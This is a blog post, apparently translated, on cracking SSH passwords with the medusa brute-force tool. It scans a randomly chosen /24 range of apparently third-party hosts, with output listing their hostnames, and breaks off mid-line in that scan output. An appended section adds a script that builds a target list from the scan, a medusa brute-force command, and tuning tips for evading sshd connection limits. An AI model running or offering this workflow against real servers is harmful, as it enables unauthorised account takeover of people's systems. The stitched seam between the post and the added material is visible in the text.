
Cracking SSH passwords with medusa

程序员文章站 2022-08-12 22:42:17

From the 一不小心高潮了 blog

Bored, so here is a quick write-up. medusa is fairly fast at password guessing. First, let's look at the help output:

root@perl-exploit:/pentest/exploits/framework3# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT]    : Target hostname or IP address
-H [FILE]    : File containing target hostnames or IP addresses
-u [TEXT]    : Username to test
-U [FILE]    : File containing usernames to test
-p [TEXT]    : Password to test
-P [FILE]    : File containing passwords to test
-C [FILE]    : File containing combo entries. See README for more information.
-O [FILE]    : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT]    : Name of the module to execute (without the .mod extension)
-m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
                 different parameter each time and they will all be sent to the module (i.e.
                 -m Param1 -m Param2, etc.)
-d           : Dump all known modules
-n [NUM]     : Use for non-default TCP port number
-s           : Enable SSL
-g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
-r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
-R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM]     : Total number of logins to be tested concurrently
-T [NUM]     : Total number of hosts to be tested concurrently
-L           : Parallelize logins using one username per thread. The default is to process
                 the entire username before proceeding.
-f           : Stop scanning host after first valid username/password found.
-F           : Stop audit after first valid username/password found on any host.
-b           : Suppress startup banner
-q           : Display modules usage information
-v [NUM]     : Verbose level [0 - 6 (more)]
-w [NUM]     : Error debug level [0 - 10 (more)]
-V           : Display version
-Z [NUM]     : Resume scan from host #

OK, now let's see which modules medusa ships with and which protocols they can attack:

root@perl-exploit:/pentest/exploits/framework3# medusa -d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

Available modules in "." :

Available modules in "/usr/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 1.0.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
    + http.mod : Brute force module for HTTP : version 1.3.0
    + imap.mod : Brute force module for IMAP sessions : version 1.2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
    + mysql.mod : Brute force module for MySQL sessions : version 1.2
    + ncp.mod : Brute force module for NCP sessions : version 1.0.0
    + nntp.mod : Brute force module for NNTP sessions : version 1.0.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
    + pop3.mod : Brute force module for POP3 sessions : version 1.2
    + postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
    + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
    + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
    + rsh.mod : Brute force module for RSH sessions : version 1.0.1
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
    + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
    + svn.mod : Brute force module for Subversion sessions : version 1.0.0
    + telnet.mod : Brute force module for telnet sessions : version 1.2.2
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
    + vnc.mod : Brute force module for VNC sessions : version 1.0.1
    + web-form.mod : Brute force module for web forms : version 1.0.0
    + wrapper.mod : Generic Wrapper Module : version 1.0.1

Since we want to attack SSH, we load the SSH module with -M ssh (the module name is given without the .mod extension).

First we need targets, so we scan for hosts with SSH open; here a /24 is picked at random:

root@perl-exploit:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24

Then comes a long wait. The options above mean: scan the whole range for hosts with TCP port 22 open, probe the service version (-sV), and save the results in nmap's greppable format (-oG) to the file named ssh.

Then we look at the scan results:

root@perl-exploit:/pentest# cat ssh
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap -sV -p22 -oG ssh 69.163.190.0/24
Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.5 (myrck.spongebob.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.7 (ps11591.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.8 (ps10854.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com) Ports: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p
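The step this post is working toward is handing those hosts to medusa through -H. The following is an added example, not from the original post: it parses greppable (-oG) output of the format shown above into a one-IP-per-line target file, keeping only hosts whose port 22 is reported open rather than closed or filtered, and reports how many it wrote. The sample scan lines, the IPs and hostnames in them, and the users.txt/passwords.txt wordlist names are all constructed for the example.

```shell
#!/bin/sh
# Added example, not from the original post: turn nmap's greppable (-oG)
# output into the plain host list medusa reads with -H, keeping only hosts
# whose SSH port is reported open. Everything below is constructed sample
# data; the IPs, hostnames and file names are made up.

# Constructed sample in the same format nmap -oG writes (one host per line).
SAMPLE_GNMAP='# Nmap 5.00 scan initiated (constructed sample) as: nmap -sV -p22 -oG ssh 10.0.0.0/29
Host: 10.0.0.1 (gw.example.test) Ports: 22/closed/tcp//ssh///
Host: 10.0.0.4 (web1.example.test) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 10.0.0.5 (db1.example.test) Ports: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/
Host: 10.0.0.6 (fw.example.test) Ports: 22/filtered/tcp//ssh///
Host: 10.0.0.7 (multi.example.test) Ports: 80/open/tcp//http///, 22/open/tcp//ssh///'

# open_hosts FILE [PORT]: print the IP of every host whose PORT is "open".
# A greppable line looks like
#   Host: <ip> (<name>) Ports: <port>/<state>/<proto>//<service>//<version>/, <port>/...
# so we split the Ports field on ", " and test each <port>/<state> pair
# instead of grepping the whole line, which would also match e.g. 2222/open
# or the "ssh" service name on a closed port.
open_hosts() {
    file=$1
    port=${2:-22}
    awk -v p="$port" '
        /^Host: / && /Ports: / {
            split($0, parts, "Ports: ")
            n = split(parts[2], entries, ", ")
            for (i = 1; i <= n; i++) {
                split(entries[i], f, "/")
                if (f[1] == p && f[2] == "open") { print $2; break }
            }
        }' "$file"
}

# write_targets GNMAP_FILE OUT_FILE: build the -H file and return its host count.
write_targets() {
    open_hosts "$1" 22 > "$2"
    wc -l < "$2" | tr -d ' '
}

# Stand-alone demo on the constructed sample.
gnmap=$(mktemp) && targets=$(mktemp)
printf '%s\n' "$SAMPLE_GNMAP" > "$gnmap"
echo "hosts with 22/open: $(write_targets "$gnmap" "$targets")"
cat "$targets"
# Follow-on step (not run here; users.txt and passwords.txt are assumed wordlists):
#   medusa -H targets.txt -U users.txt -P passwords.txt -M ssh -e ns -t 4 -f -O medusa.log
rm -f "$gnmap" "$targets"
```

The state is parsed rather than grepping for "ssh" because the greppable line still names the service on closed ports (see the 69.163.190.1 to .3 lines above), so a naive grep would hand medusa hosts it cannot connect to and burn the -g/-R retries on each. Keep -t modest against sshd: OpenSSH's MaxStartups limit (10 unauthenticated connections by default) makes the server drop extra connection attempts, which medusa reports as connection errors rather than failed logins.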